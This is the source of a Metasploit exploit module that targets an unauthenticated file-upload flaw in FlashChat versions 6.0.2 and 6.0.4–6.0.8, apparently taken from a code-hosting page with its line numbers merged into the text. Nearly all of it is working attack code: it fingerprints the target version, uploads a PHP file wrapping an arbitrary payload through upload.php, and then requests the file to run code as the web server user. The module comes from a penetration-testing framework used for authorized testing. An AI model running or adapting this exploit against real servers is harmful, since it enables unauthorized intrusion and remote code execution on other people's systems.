Path: blob/master/modules/exploits/unix/webapp/flashchat_upload_exec.rb
19591 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::EXE10include Msf::Exploit::FileDropper1112def initialize(info = {})13super(14update_info(15info,16'Name' => "FlashChat Arbitrary File Upload",17'Description' => %q{18This module exploits a file upload vulnerability found in FlashChat19versions 6.0.2 and 6.0.4 to 6.0.8. Attackers can abuse the upload20feature in order to upload malicious PHP files without authentication21which results in arbitrary remote code execution as the web server user.22},23'License' => MSF_LICENSE,24'Author' => [25'x-hayben21', # Discovery and PoC26'bcoles' # Metasploit27],28'References' => [29['OSVDB', '98233'],30['EDB', '28709']31],32'Payload' => {33'BadChars' => "\x00"34},35'Arch' => ARCH_PHP,36'Platform' => 'php',37'Targets' => [38# Tested on FlashChat version 6.0.839[ 'Generic (PHP Payload)', {} ]40],41'Privileged' => false,42'DisclosureDate' => '2013-10-04',43'DefaultTarget' => 0,44'Notes' => {45'Reliability' => UNKNOWN_RELIABILITY,46'Stability' => UNKNOWN_STABILITY,47'SideEffects' => UNKNOWN_SIDE_EFFECTS48}49)50)5152register_options(53[54OptString.new('TARGETURI', [true, 'The base path to FlashChat', '/chat/'])55]56)57end5859#60# Checks if target is running FlashChat versions 6.0.2, 6.0.4 to 6.0.861#62def check63uri = normalize_uri(target_uri.path, '')64res = send_request_raw({ 'uri' => uri })6566if not res67vprint_error("Connection timed out")68return Exploit::CheckCode::Unknown69end7071version = res.body.scan(/<title>FlashChat v([\d\.]+)/).flatten[0] || ''7273if version.empty?74return Exploit::CheckCode::Unknown75end7677vprint_status("Version found: #{version}")7879if version =~ /6\.0\.(2|4|5|6|7|8)/80return Exploit::CheckCode::Appears81elsif version <= "6.0.8"82return Exploit::CheckCode::Detected83else84return Exploit::CheckCode::Safe85end86end8788#89# Uploads our malicious file90# Stolen from havalite_upload_exec.rb91#92def upload(base)93fname = "#{rand_text_alphanumeric(rand(10) + 6)}.php"94php = "<?php #{payload.encoded} ?>"95data = Rex::MIME::Message.new96data.add_part(php, "application/octet-stream", nil, "form-data; name=\"file\"; filename=\"#{fname}\"")97post_data = data.to_s9899res = send_request_cgi({100'method' => 'POST',101'uri' => normalize_uri(base, 'upload.php'),102'ctype' => "multipart/form-data; boundary=#{data.bound}",103'data' => post_data104})105106if not res107fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")108elsif res.code.to_i == 404109fail_with(Failure::NotFound, "#{peer} - No upload.php found")110elsif res.code.to_i == 500111fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")112end113114return fname115end116117#118# Executes our uploaded malicious file119# Stolen from havalite_upload_exec.rb120#121def exec(base, payload_fname)122res = send_request_raw({123'uri' => normalize_uri(base, 'temp', payload_fname)124})125126if res and res.code == 404127fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")128end129end130131def exploit132base = target_uri.path133134# upload135print_status("Uploading malicious file...")136fname = upload(base)137138# register the file to clean139register_files_for_cleanup(fname)140141# exec142print_status("Executing #{fname}...")143exec(base, fname)144end145end146147148